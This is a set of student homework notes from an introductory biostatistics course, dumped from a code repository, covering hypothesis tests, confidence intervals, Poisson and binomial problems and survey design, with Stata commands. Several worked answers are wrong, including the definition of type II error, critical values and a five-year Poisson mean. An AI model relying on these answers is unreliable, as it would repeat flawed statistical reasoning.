Interval] \n> -------- | -------- | ---------- | ---------- | ---------- | ------------------------ | -------------------------\n> heartr~2 | 61 | 76.55738 | 2.800032 | 21.86895 | 70.95648 | 82.15827\n\n> mean = mean(heartrte2) t = -1.2295 \n> Ho: mean = 80 degrees of freedom = 60 \n> Ha: mean < 80 Ha: mean != 80 Ha: mean > 80 \n> Pr(T < t) = 0.1118 Pr(|T| > |t|) = 0.2237 Pr(T > t) = 0.8882\n\n4. Present your results - test statistic, p-valu..\n \n> => test statistic= t= -1.2295 \n> => degrees of freedom = 60 \n \n> Under the null hypothesis, this test statistic follows a t-distribution with 60 degrees of freedom. Given that null distribution we can say that my p-value is \n> => Pr(|T| > |t|) = **0.2237** \n \n5. Conclusion reject the null or fail to reject the null\n\n> Given that my p-value is **0.2237** and I know that p is greater than 0.05, I'm going to fail to reject. \n> => **fail to reject the null hypothesis**\n\n6. Make a conclusion about your data\n\n> => We do not have any evidence in data to sugeest that the heart rate is different from 80 in healthy young adults at follow-up. \n> => So we don't see any evidence for the alternative hypothesis in our data set\n\n\n### Hypothesis Testing ###\n> Click on the link above to obtain a subsample of the BMI at baseline among 20 Framingham participants in the dataset subset.dta. Assume that BMI at baseline is normally distributed, but the variance of BMI at baseline is unknown.\n\n1. Construct a 90% confidence interval for BMI at baseline among Framingham participants using the subsample.\n\n> 90% is 1.64 for a normal distribution\n\n\tsum bmi1\n\tdi 26.3335 - 1.64*3.99473\n\tdi 26.3335 + 1.64*3.99473\n=> **[19.782143, 32.884857]**\n\n\n2. Using the confidence interval in question 1 above, would you reject the null hypothesis that BMI among participants with diabetes is equal to 27 (versus the alternative that BMI is not equal to 27) at the 90% confidence level? 
(Hint: does the confidence interval contain 27?)\n\n> Hypotheses | \n> -------------- | \n> H_0: μ = 27 | \n> H_A: μ != 27 | \n\n> => **Yes** \n> No \n\n\n3. For normally distributed random variables with known variance, the width of the 90% predictive interval for the sample mean is equal to the width of a 90% confidence interval for the population mean.\n\n> True \n> => **False** \n\n\n4. For the test described in question 2 above, what is:\n\n\tttest bmi1 = 27, level(90)\n\n> => the value of test statistic: **-0.7462** \n> => the distribution of the test statistic under the null hypothesis: t-distribution with 19 degrees of freedom \n> => the p-value: **0.4647**\n\n\n5. Using the confidence interval above, we conclude that BMI at baseline in the Framingham cohort is not different from 27 at the α=0.1 level of significance. \n> => Yes, we fail to reject the null hypothesis\n\n> True \n> => **False**\n\n\n6. If an outlier is disproportionately influencing your hypothesis test, you should always throw it out. \n\n> True \n> => **False**\n\n\n" }, { "alpha_fraction": 0.7755835056304932, "alphanum_fraction": 0.7917414903640747, "avg_line_length": 110.19999694824219, "blob_id": "daaa349fd79cab6c79bac1689eaabf4a9678d6e4", "content_id": "6942017ab4d137cd7ab0881326cbc76c7743aded", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 557, "license_type": "no_license", "max_line_length": 442, "num_lines": 5, "path": "/PH207x/homework/ten/Confounding and Effect Modification.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Confounding and Effect Modification #\nDr. Smith conducts a randomized clinical trial to determine if aspirin reduces the risk of heart attack. Fifty percent of male patients are exposed and fifty percent of female patients are exposed. 
He finds an incidence rate ratio (IRR) of 0.75 comparing people who were assigned to take aspirin to those assigned to placebo. Among men, he finds that those assigned to take aspirin have an IRR=0.60 but among women, the IRR=0.95. Is gender a:\n* Confounder \n* Effect modifier \n* Both a confounder and effect modifier \n" }, { "alpha_fraction": 0.6116182804107666, "alphanum_fraction": 0.6937759518623352, "avg_line_length": 36.0461540222168, "blob_id": "ea40842fc7ced6ca28f42475d2d690db9aae1d21", "content_id": "28a9d405e7b072c4f40f56751e2aa38355e77548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2425, "license_type": "no_license", "max_line_length": 513, "num_lines": 65, "path": "/PH207x/homework/six/Confidence intervals and testing with unknown variance.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Confidence intervals and testing with unknown variance#\nSuppose now that we are interested in the distribution of hemoglobin levels in Mumbai. We decide that it is unreasonable to extrapolate the Delhi results to Mumbai, and therefore the population standard deviation is unknown. We take a random sample of 15 children in Mumbai. The sample mean is xˉ=115 g/L, with sample standard deviation s=10.2 g/L. Assume hemoglobin levels in Mumbai are normally distributed (we could check this by looking at the distribution of hemoglobin levels in other similar populations). \n\n> n= 15 \n> xˉ= sample mean= 115 g/L\n> s= sample standard deviation= 10.2 g/L\n\n\n1. Construct a two-sided 95% confidence interval for μ.\n> t_15-1,0.995= 1.96 \n> x⁻ +- t_15-1,0.9955 * s/SQRT(n)= 115 +- 1.96*10.2/sqrt(15)\n\n\tdi 115+1.96*10.2/sqrt(15)\n\tdi 115-1.96*10.2/sqrt(15)\n> => **[ 109.83809, 120.16191 ]**\n\n> test: cii 15 115 10.2, level(95)\n\n\n2. 
Use the confidence interval in question 1 above to answer the following questions:\n\n* Would you reject the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the **α=0.05** level?\n\n> μ_0= 108 \n> Reject if Z is > 1.96 or < -1.96, then Pr(reject H_0 when true) = α = 0.05\n> z= (x⁻ - μ_0) / (s/SQRT(n))= (115 - 108) / (10.2/sqrt(15))= **2.6579297**\n\n> z > 1.96\n\n> => **yes** \n> no \n> not enough information \n\n\n* Would you reject the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the **α=0.01** level?\n\n> yes \n> no \n> => **not enough information**\n\n\n* Would you reject the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the **α=0.1** level?\n\n> => **yes** \n> no \n> not enough information \n\n\n3. Conduct a one-sample t-test to test the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the α=0.01 level.\n> μ_0= 108 \n\n\tttesti 15 115 10.2 108\n\n\n* What is your test statistic? \n> => **t = 2.6579**\n\n* Under the null hypothesis, the test statistic follows a t-distribution with how many degrees of freedom? 
\n> => **degrees of freedom = 14**\n\n* What is your p-value?\n> => **0.0187**\n\n* What do you conclude?\n> => **fail to reject the null hypothesis**\n\n\n" }, { "alpha_fraction": 0.5645756721496582, "alphanum_fraction": 0.6735994815826416, "avg_line_length": 36.224998474121094, "blob_id": "1f2403cb479c8f94b0f1fed9f95eb13ab8a63074", "content_id": "c72c852e17ce81ed125510f1faea7eb33583da9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2981, "license_type": "no_license", "max_line_length": 272, "num_lines": 80, "path": "/PH207x/homework/four/Lung cancer and the Poisson distribution.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Lung cancer and the Poisson distribution\nRecall: According to data from the CDC in 2010, 19.3% of adults age eighteen and older smoke cigarettes. In the year 2008, the incidence rate of lung cancer was 65.1 cases per 100,000 people per year.\n\nSuppose you are conducting a lung cancer study in the United States, and you obtain a random sample of 2,000 adults (over 18 years of age) who do not have lung cancer. You plan to follow this study cohort over a period of 5 years and observe incident cases of lung cancer.\n\nLung cancer and the Poisson distribution. Because lung cancer is a rare disease, we can model cases of lung cancer using the Poisson distribution, with incidence rate 65.1 cases per 100,000 person-years.\n\n**Q1: Using the Poisson distribution, what is the probability that you observe more than 1 lung cancer case in the first year?** *Hint1: Please see that it is more than 1 lung cancer. 1 is not included.* \n>\tP(X>1)= ? 
\n>\t \n>\tk=1 \n>\tn=2000 \n>\tp=0.00065 \n>\tm= mean= n*P= 2000*0.000651= 1.302 \n>\tP(X>1)= P(X>=1)-P(X=1)= poissontail(m,k) - poissonp(m,k) \n\n\tdi poissontail(1.302,1) - poissonp(1.302,1)\n\n>\t=> **0.37388529**\n\n\n**Q2: What is the expected number of lung cancer cases observed over the five year study period?** \n*Hint1: It is 5 year study period. Same number of Cancer will be produced each year.* \n*Hint2: In a year how many cancer cases will be observed among the 2000 randomly selected individuals?* \n>\tincidence_rate= 0.000651 \n>\t \n>\tduration= 5 \n>\tprevalence = incidence_rate * duration= 0.000651 * 5= 0.003255 \n>\tE(x)= n*p= 0.003255*2000= **6.51**\n\n**Q3: What is the variance of the number of lung cancer cases observed over the five year study period?** \n*Hint1: In the formula for variance which is np(1-p) if p is too tiny tiny tiny what will (1-p)equal to and ultimately np(1-p)=???. It was already indicated that lamda = mean = np.* \n\t \n>\tn=2000 \n>\tp=0.00065 \n>\tvariance= np(1-p)= 2000*0.00325*(1-0.00325)= **6.478875**\n\n\n**Q4: What is the probability that you observe more than 10 lung cancer cases over the five year period?** \n*Hint1: It is more than 10. 10 is not included. 5 years period. In stata, di poisson(mean,X) gives result inclusive of X.* \n\t \n>\tk=10 \n>\tn=2000 \n>\tp=0.00065 \n>\tm= mean= n*P= 2000*0.000651= 1.302\n>\t \n>\tP(X>10)= ? 
\n>\tP(X>10)= P(X>=10)-P(X=10)= poissontail(1.302,10)-poissonp(1.302,10) \n\n\tdi poissontail(1.302,10)-poissonp(1.302,10)\n\n>\t=> 1.392e-07\n\n\tclear all\n\tset obs 11\n\tgen k=10\n\tgen m=_n*2000*0.000651\n\tgen p = poissontail(m,k)-poissonp(m,k)\n\tlist m p\n\n>\t=> **0.0673981**\n\n\n**Q5: What is the probability that you observe less than 5 lung cancer cases over the five year period?** \n\t \n>\tk=5 \n>\tn=2000 \n>\tp=0.00065 \n>\tm= mean= n*P= 2000*0.000651= 1.302 \n>\t \n>\tP( X<5 )= P(X<=k)-P(X=k)= poisson(m,k) - poissonp(m,k) \n\n\tclear all\n\tset obs 11\n\tgen k=5\n\tgen m=_n*2000*65.1/100000\n\tgen p = poisson(m,k) - poissonp(m,k)\n\tlist m p\n\n>\t=> **0.2225557**\n\n\n\n" }, { "alpha_fraction": 0.737393319606781, "alphanum_fraction": 0.7715283036231995, "avg_line_length": 57.59090805053711, "blob_id": "825a9ce36d1350e255e3f1cb7fa8830f7e0482e2", "content_id": "29491638328946478861160a3c70d03b6a8dc8a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2582, "license_type": "no_license", "max_line_length": 430, "num_lines": 44, "path": "/PH207x/homework/ten/Multiple Linear Regressio.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Multiple Linear Regression #\nAgain, we model the amount of nickel found in the sediment. Now, we model nickel as a function of both time (month) and location (longitude). The Gulf Coast in Louisiana is somewhat horizontal, so for simplicity we will ignore longitude in this problem. \n \nFit a linear regression model with nickel as the outcome and with month and longitude as explanatory covariates. Model month as a continuous variable, as in Model 2 from the previous question. Call this Model 3. Assume the assumptions of linear regression hold. 
\n \nhttps://maps.google.com/maps/ms?msid=205190672353608758732.0004d1dab620c7540a566&msa=0&ll=29.544788,-91.384277&spn=4.758846,7.613525 \n \n \n**TODO:**\n* Fit a linear regression model with nickel as the outcome and with month and longitude as explanatory covariates\n\n```stata\n\tregress nickel month longitude\n\tregress nickel longitude\n\ttwoway (scatter nickel longitude)\n```\n\n##### 1. Compare the adjusted R-squared from Models 2 and 3. Does the addition of longitude improve the adjusted R-square? #####\n* Yes\n* No \n\n##### 2. Test whether the coefficient for longitude in the model is equal to 0 at the 0.05 level of significance. #####\n\n1. What is the estimated coefficient? \n\n2. The estimated standard error of the estimated coefficient?\n\n3. The estimate of the test statistic?\n\n4. The number of degrees of freedom of the distribution of the test statistic under the null hypothesis? \n> **Hint1:** n-k-1: n is the sample size k is the number of variables 1 is 1, obviously\n\n5. The p-value?\n\n6. Your conclusion?\n\t- We have no evidence that, for a given month, average nickel levels have a linear relationship with longitude. \n\t- We have evidence that, for a given month, average nickel levels have a linear relationship with longitude. \n\n\n##### 3. For each month, make a scatter plot with longitude on the x-axis and nickel on the y-axis to assess the linearity assumption. Conditional on month, does the relationship between nickel and longitude appear to be linear? (Hint: try the example problems in the lecture sequence to help with constructing the scatter plot.) #####\n* Yes\n* No \n\nIn this example, our regression results show that we cannot assume a linear relationship between nickel levels and longitude, conditional on month. Incorporating location into statistical models is a whole genre of what is conveniently called spatial statistics. It is well beyond the scope of this course, but this is a brief introduction into “thinking spatially”. 
We need a more flexible model to reflect spatial heterogeneity.\n" }, { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.7323824167251587, "avg_line_length": 58.98305130004883, "blob_id": "b4a7b622fac75405958f2e32b41927c6552fe105", "content_id": "08774f414ab5bde87437420b415c6a2cc6028ef3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7081, "license_type": "no_license", "max_line_length": 451, "num_lines": 118, "path": "/PH207x/homework/eight/Survey Design.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Survey Design #\n> You decide to conduct a survey to measure physical activity in Boston. You plan to collect information on the amount of physical activity per week, history of diabetes, weight, height, age, and gender. \n> \n> There are seventeen distinct neighborhoods in Boston, with substantial differences in race/ethnicity, socioeconomic status, and population density. You expect to observe variability in physical activity indicators by neighborhood. Unfortunately there is no specific information about within-neighborhood heterogeneity (variance); therefore, you design the survey based on the assumption that variances of indicators are equal across neighborhoods. \n> \n>The table below displays population data for Boston in 2010. 
Assume that these population numbers are still accurate today.\n\n\tNeighborhood | Population - 2010\n\t----------------------- | ------------------\n\t South End | 34669\n\t Central | 30901\n\t Fenway - Kenmore | 40898\n\t South Boston | 33688\n\t Charlestown | 16439\n\t Allston - Brighton | 74997\n\t West Roxbury | 30445\n\t Roxbury | 59790\n\t East Boston | 40508\n\t Jamaica Plain | 39897\n\t Back Bay - Beacon Hill | 27476\n\t Hyde Park | 31813\n\t North Dorchester | 28384\n\t South Dorchester | 59949\n\t Roslindale | 32589\n\t Mattapan | 34616\n\t Harbor Islands | 535\n\t Boston | 617594\n\n> *Source: Boston Redevelopment Authority Research Division (2011). Boston 2010 Census Population: Planning District Comparison: http://www.bostonredevelopmentauthority.org/PDF/ResearchPublications//PDPercentChange.pdf*\n\n> Data which we need:\n* seventeen distinct neighborhoods\n\n\n#### 1. Consider the following questions ####\n> Suppose you decided to randomly sample 1,700 people from the city of Boston (call this Design 1). For any given individual in South Dorchester, what is the probability of being selected in the survey? What is this probability for an individual in Harbor Islands? \n> **Hint1:** How could be the probability of Harbor Island be equal to the one of South Rochester ? (groups of selection were previously specified) \n> **Hint2:** It should work f=n/N for: q1 (sample size 1700) \n> **Hint3:** If you have a sample size(n), and a population size in Boston(N), and you now the formula that n/N, they have equal chances to be selected\n\n> **Design 1:**\n\n\tgen weight_srs=617594/1700 \n\tgen fpc=1700/617594 \n\tdi fpc\n\n> => *fpc= 0.00275262*\n\n* South Dorchester: **0.00275262**\n* Harbor Islands: **0.00275262**\n\n\n#### 2. What is likely the main challenge of conducting this survey? 
####\n> **Hint1:** This document helps: Advantages and disadvantages of simple random sampling: http://dissertation.laerd.com/simple-random-sampling.php#ad-dis\n\n* SRS is difficult to implement in practice \n* SRS does not necessarily sample people from each neighborhood \n\n#### 3. Now, you randomly sample 100 people within each neighborhood (Design 2). What is the probability of a random individual in South Dorchester being sampled? What is the probability of a randomly selected individual in Harbor Islands being sampled? ####\n> **Hint1:** It should work f=n/N for: q3 (sample size 100)\n\n> **Design 2:**\n\n\tgen fpc_south_dorchester=100/59949 \n\tgen fpc_harbor_islands=100/535 \n\n> => *fpc_south_dorchester= 0.00166808* \n> => *fpc_harbor_islands= 0.18691589* \n\n* South Dorchester: **0.00166808** \n* Harbor Islands: **0.18691589**\n\n#### 4. What kind of survey design is Design 2? ####\n* stratified sample \n* cluster sample \n* simple random sample \n\n#### 5. Consider an alternate design (Design 3). In each neighborhood the number of individuals sampled is proportional to the population size of the neighborhood. Assuming that the sample size is fixed at 1,700, would you expect Design 2 or Design 3 to provide more precise estimates of the physical activity indicators among Boston residents? ####\n> **Hint1:** You just need to think about the two designs. One is a sample where you randomly select 100 people from every neighbourhood. The other is a sample where the number selected is proportional to the size of the neighbourhood. So areas with a small population with have less people selected than a region with a large population.\n\n* Design 2\n* Design 3\n\n#### 6. For Design 3, consider the probability of a random individual in South Dorchester being sampled; and the probability of a random individual in Harbor Islands being sampled. 
These probabilities are approximately the same as the probabilities calculated using: ####\n\n* Design 1\n* Design 2\n\n#### 7. Why might you want to use Design 2 compared to Design 3? ####\n\n* to increase precision \n* if you wanted neighborhood-specific estimates \n* for both precision and neighborhood specific estimates \n\n#### 8. Next, you decide you do not want to visit all 17 neighborhoods, so you randomly sample 10 neighborhoods. Within each sampled neighborhood selected, you randomly sample 170 people. Call this Design 4. What is the probability of a random individual in South Dorchester being included in the survey? What is the probability of a random individual in Harbor Islands being included in the survey? ####\n> **Hint1:** Watch 7th video of Survey Data Analysis: Tutorial Survey data Analysis in STATA(continued)- first 5 minutes \n> **Hint2:** My suggestion is: make a table in excel with the data and do calculations over there is pretty straightforward to answer q8, q9 and q10\n> **Hint3:** It should work f=n/N for: q8 you randomly sample 10 neighborhoods out of 17 and multiply that by n/N (sample size 170)\n> **Hint4:** If you were a person in district x. What is the probability of your district being chosen. Then go on from there. \n\n> **See my calc file for the solution of question 8**\n\n* South Dorchester: **0.0016680845**\n* Harbor Islands: **0.1869158879**\n\n#### 9. A \"self-weighting\" design is a survey design for which every individual in the population has an equal probability of inclusion. Which survey designs are self-weighting (or approximately self-weighting)? ####\n\n* Designs 1 and 2 \n* => **Designs 1 and 3** - 1 ist constant as well as 2 and 4 are variable \n* Designs 2 and 3 \n* Designs 1 and 4 \n* Designs 2 and 4 \n\n#### 10. Consider yet another design (Design 5), in which you again select 10 neighborhoods. Now, the probability of a neighborhood being included in the survey is proportional to its population size. 
Within each sampled neighborhood, you randomly sample 170 people. Would you expect Design 4 or Design 5 to provide more precise estimates of the physical activity indicators among Boston residents? ####\n> **Hint1:** In Design 4, you randomly choose 10 districts out of 17, this means that all districts have the same probability of being chosen regardless of the size of their population. Design 5 is another story, the sampling of the districts is proportional to the size of their population, which means bigger districts are more likely to get chosen. \n\n* Design 4\n* Design 5 \n\n\n" }, { "alpha_fraction": 0.47623658180236816, "alphanum_fraction": 0.5601587295532227, "avg_line_length": 33.41999816894531, "blob_id": "e7bb64824119cfaac3e920167fbe5929547ddbe3", "content_id": "dcb17046f2c3058f3bd39588b546468ed7acbaac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 10514, "license_type": "no_license", "max_line_length": 521, "num_lines": 300, "path": "/PH207x/excercises/Lesson5/ Sampling Distributions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Sampling Distributions \n## Central limit theorem\n\n> sd= σ/SQRT(n)\n> z= (x⁻ - μ) / sd\n\n> x⁻ >= 260 \n> z= 260-μ / ( σ/SQRT(25) )= 2.57\n\n\tdi 1-normal(2.57)\n\n> z= 0.00508483\n\n> So the probability of getting a sample mean of 260 or higher when taking a sample of 25 is about 0.5%\n\n## Sample Size \nHow big a sample do we need to be 95% sure that the sample mean for total cholesterol level is within +- 25mg/100ml of the population mean?\n\n> P_r{ -25 <= x⁻-μ <) 25 }= 0.95\n> P_r{ -25/(44.7/SQRT(n)) <= (x⁻-μ)/(44.7/SQRT(n) <= 25/(44.7/SQRT(n)) }= 0.95\n\n> => 25/(44.7/SQRT(n))= 1.96\n> => n=12.3 => n= 13\n\n> So, in general if we want to be 95% sure that the sample mean will be within +- delta of the population mean, then we need a sample of size\n\n> n= ( (1.96*σ) / delta )^2\n\n> where σ is the population 
standard deviation\n\n## Confidence Interval \nIs a 95% confidence interval for μ. In other words it is a rule that has a 95% chance of success - success being measured\n\n> σ is known\n\n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ]\n\n\n## Predictive vs. Confidence Interval \n\n> Z= (X-μ) / σ\n\n> So, [ μ-1.96*σ, μ+1.96*σ ] \n> is a predictive interval (95%) for X, just as \n>\t[ μ-1.96*σ/SQRT(n), μ+1.96*σ/SQRT(n), ]\n> is a predictive interval for x⁻, and \n>\t[ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ]\n> is a confidence interval for μ\n\n\n## Width of Confidence Intervals \n\nLength | Formular | width\n------- | -------------------- | --------\n 95% | x⁻+-1.96*σ/SQRT(n) | 3.92*σ/SQRT(n)\n 99% | x⁻+-2.58*σ/SQRT(n) | 5.16*σ/SQRT(n)\n\nn | 95% CI for μ | Interval width\n------- | -------------------- | --------\n 10 | x⁻+-0.620*σ | 1.240*σ\n 100 | x⁻+-0.196*σ | 0.392*σ\n 1000 | x⁻+-0.062*σ | 0.124*σ\n\n> Smaller is σ, the tighter are the bounds - more homogeneous\n\n\n## Unknown variance: the t distribution - Student's T\nWhat if is σ is unknown\n\n> t= (x⁻-μ) / (s/sqrt(n)) \n> has n-1 degrees of freedom\n\n> **Sample**:\tsize n\n>\t\tsample mean x⁻\n>\t\tsample standard deviation s\n\n> **Population**:\tX is approx. normal\n>\t\tmean μ\n>\t\tstandard deviation σ\n\n\n## Questions to Confidence and Predictive Intervals ##\nAgain, let X denote BMI at baseline for a Framingham study participant. Assume X is normally distributed.\n\n\n#### Q1. Calculate a 90% predictive interval for X. ####\n> 90% is between -1.64 and +1.64 \n> [ x⁻-1.64*σ/SQRT(n), x⁻+1.64*σ/SQRT(n), ]\n\n\tset seed 2 \n\tsample 20, count \n\tsum bmi1\n\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n-------------|------------|------------|-------------|-----------|---------\n bmi1 | 4415 | 25.84616 | 4.101821 | 15.54 | 56.8\n\n>\tdi 25.84616 - 1.64*4.101821 \n>\tdi 25.84616 + 1.64*4.101821\n> => **[19.119174, 32.573146 ]**\n\n\n#### Q2. 
For a random sample of size 10, calculate a 90% predictive interval for the sample mean of X. ####\n> n= 10 \n\n>\tsample 10, count\n>\tset seed 2\n>\tsum bmi1\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n-------------|------------|------------|-------------|-----------|---------\n bmi1 | 4415 | 25.84616 | 4.101821 | 15.54 | 56.8\n\n\n>\tdi 25.84616 - invnormal(0.95)*4.101821/sqrt(10)\n>\tdi 25.84616 + invnormal(0.95)*4.101821/sqrt(10)\n> => **[23.712604, 27.979716]**\n\n\n#### Q3. For normally distributed random variables with known variance, the width of the 90% predictive interval for the sample mean is equal to the width of a 90% confidence interval for the population mean. ####\n> => **True**\n> False \n\n\tci bmi1, level(90)\n\n\n> Variable | Obs | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> ------------|-------------|-----------|--------------|------------------------------|--------------------------\n> bmi1 | 20 | 25.0295 | .712055 | 23.79826 | 26.26074 \n\n\n## Introduction to Hypothesis Testing ##\n\n### Example ###\nWe know that total cholesterol levels in *our* Framingham population are distributed with mean μ = 237 mg/100ml and standard deviation σ = 44.7 mg/100ml.\n\n#### Q1. We have a sample of 49 total cholesterol levels and their average is x⁻= 230 mg/100ml?\n\n>\tsd= σ/sqrt(n)= 44.7/7= 6.3857143 \n> => So 230 is one standard error away from 237, and so the central limit theorem tells us that what we're talking about is quite possible.\n\n\n### Is it reasonable to assume that this is a sample from our population? ###\n> Use of 95% confidence interval to infer value of mean μ (μ=237) \n> [ x⁻ +- 1.96 σ/sqrt(n) -> x⁻ +- 1.96 47.7/sqrt(49) -> **x⁻ +- 13.356** \n> has a 95% chance of including μ.\n\n\nif x⁻ | 95% Conf. 
Interval | Include μ?\n------ | ------------------- | -----------------------------\n230 | [216.6, 243.4] | yes, depends on 243.4 > 237\n223 | [209.6, 236.4] | no, depends on 236.4 < 237\n215 | [201.6, 228.4] | no, depends on 228.4 < 237\n\n\n### Formalism of Hypothesis Testing ###\n\n* Propability of **Type I** error is **α** \ni.e. the probability of rejecting the null hypothesis when it is true\n\n* Propability of **Type II** error is **β** \ni.e. the probability of **not** rejecting the null hypothesis when it is true\n\n* **1-β** is the power of the test\n\n\n### Testing for the population mean: one vs. two-sided tests ###\n\n1. Hypothesize a value (μ_0)\n2. Take a random sample (n)\n3. Is it *likely* that the sample came from a population with mean μ_0 (α=0.05)? \nLook at (x⁻-μ_0)/σ and decide. One sided or two: Decide the difference between the sample mean and the hypothesized mean. Is it too large or not!\n\n\nNeed to set up 2 hypotheses to cover all possibilities for μ. Choose one of three possibilities:\n\nHypotheses | Formular\n----------- | ------------\n Two-side | H_0: μ = μ_0\n Two-side | H_A: μ != μ_0\n\nHypotheses | Formular\n----------- | ------------\n One-sided | H_0: μ >= μ_0\n One-sided | H_A: μ < μ_0\n\nHypotheses | Formular\n----------- | ------------\n One-sided | H_0: μ <= μ_0\n One-sided | H_A: μ > μ_0\n\n> H_0 - Null hypothesis \n> H_A - Alternative hypothesis\n\n\n### P-values and examples ###\nLook if the data are looking consonant. 
Look at z= (x⁻ - μ_0) / (σ/SQRT(n)) and reject H_0 if Z is too large, + or -.\n\nHypotheses | \n-------------- | \nH_0: μ = μ_0 | \nH_A: μ != μ_0 | \n\nExample: Reject if Z is > 1.96 or < -1.96, then Pr(reject H_0 when true) = α = 0.05\n\n#### Example ####\n\nHypotheses | \n-------------- | \nH_0: μ = 237 | \nH_A: μ != 237 | \n\n> μ_0= 237 mg/ml \n> σ= 47.7 mg/100ml \n> n= 49 non-hypertensives \n> x⁻= 221.9 mg/100ml\n\n> z= (x⁻ - μ_0) / (σ/SQRT(n))= (221.9 - 237) / (47.7/sqrt(49))= -2.2159329\n\n> => **-2.2159329 is less than 1.96** \n> => So we reject the null hypothesis\n\n#### P-value ####\nSome prefer to quote the p-value. The p-value answers the question: \"What is the probability of getting as large, or larger, a discrepancy?\" (μ- x⁻)\n\n> z= (x⁻ - μ_0) / (σ/SQRT(n))= (221.9 - 237) / (44.7/sqrt(49))= -2.3646532= -2.37\n> P_r( z>2.37 or z < -2.37 )= 2*P_r( z>2.37 )= 2*0.0222= 0.044\n\n\tdi normal( -2.0106348 )\n> => **0.02218202** \n> => 0.044 < 0.05, which means I would reject the null hypothesis\n\n> *Hint:* normal(z) returns the cumulative standard normal distribution, so you can **NOT** take di 1-normal(2.37). if you do that, you will get the probability to get a result smaller than 2.37 standard deviations above μ.\n\n\n## Example: Atherosclerosis and Physical Activity ##\n> Oxidation of components of LDL cholesterol (the bad cholesterol) can result in atherosclerosis, or hardening of the arteries. Elosua et. al (2002) examine the impact of a 16 week physical activity program on LDL resistance to oxidation in 17 healthy young adults. After completing the program, the average maximum oxidation rate in the study participants xˉ was 8.2 μmol/min/g, and the sample standard deviation of the maximum oxidation rate was s=2.5 μmol/min/g. 
Assume that the oxidation rate is normally distributed.\n\n### Continuous data ###\n\n population standard deviation | test type | how to \n------------------------------------ | ------------------ | ---------------------------------------------------------------------------------\nσ known, large n | One-sample Z-test | Central Limit Theorem (CLT) - Normal\nσ known, normally distributed data | One-sample Z-test | x⁻~N - Normal - Z-test based on the normal distribution - z= (x⁻-μ) / (σ/SQRT(n))\nσ unknown, normally distributed data | One-sample t-test | t-distribution - t= (x⁻-μ)/(s/SQRT(n)) - t~t_n-1\n\n\n* Suppose that the average maximum oxidation rate in the population of healthy young adults who did not complete the program was 11.3μmol/min/g, and the standard deviation was 2.3μmol/min/g.\n\n* Construct a 99% predictive interval for the sample mean maximum oxidation rate from a sample of size 17 (assuming normality).\n\n> σ= 2.3 \n> n= 17 \n> x⁻_0= 11.3 \n> \n> Y~N( 11.3, 2.3² ) \n> => μ +- z_0.995 * σ/SQRT(n)\n\n\tdi 11.3-invnormal(0.995)*2.3/sqrt(17) \n\tdi 11.3+invnormal(0.995)*2.3/sqrt(17)\n> => [ 9.8631201, 12.73688 ]\n\n* Construct a 99% confidence interval for the mean oxidation rate in healthy young adults after completing the physical activity program, using the sample of 17 participants.\n\n#### t-distribution ####\n> x⁻ +- t_17-1,0.995 * s/SQRT(n) \n> s= sample standard deviation \n\n\tcii 17 8.2 2.5, level(99)\n\n Variable | Obs | Mean | Std. Err. | min [99% Conf. Interval] | max [99% Conf. 
Interval]\n------------ | ------------ | ---------- | ------------ | ------------------------ | --------------------------\n | 17 | 8.2 | .6063391 | 6.429016 | 9.970984\n\n#### z-distribution ####\n> x⁻ +- z_0.995 * σ/SQRT(n) when σ is known \n> It's always: **Z_0.995 < t_17-1,0.995** \n> and: **σ < s**\n\n\n#### One-Sample t-test ####\n> s = sample standard deviation= 2.5 \n> μ_0 = hypothesized mean= 11.3 \n> sample mean= 8.2 \n> n= sample size= 17\n\nHypotheses | \n--------------------- | \nH_0: μ = μ_0 = 11.3 | \nH_A: μ != μ_0 = 11.3 | \n\n\tdb ttest\n\tttesti 17 8.2 2.5 11.3, level(99)\n\n\n> => **Pr(|T| > |t|) = 0.0001** \n> => **degrees of freedom = 16** \n> => **t= -5.1127** \n> => α= 0.01 => p<0.01 => **reject H_0**\n\n\n\n\n\n" }, { "alpha_fraction": 0.5851016044616699, "alphanum_fraction": 0.6898419857025146, "avg_line_length": 41.57692337036133, "blob_id": "a934973cb6eefc818b1ca38fc220f8f160be830d", "content_id": "94b29e7263cb5cba5fa3cec4de99f1239ec90edc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2215, "license_type": "no_license", "max_line_length": 401, "num_lines": 52, "path": "/PH207x/homework/four/Smoking and the binomial distribution.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Smoking and the binomial distribution\nAccording to data from the CDC in 2010, 19.3% of adults age eighteen and older smoke cigarettes. In the year 2008, the incidence rate of lung cancer was 65.1 cases per 100,000 people per year.\n\nSuppose you are conducting a lung cancer study in the United States, and you obtain a random sample of 2,000 adults (over 18 years of age) who do not have lung 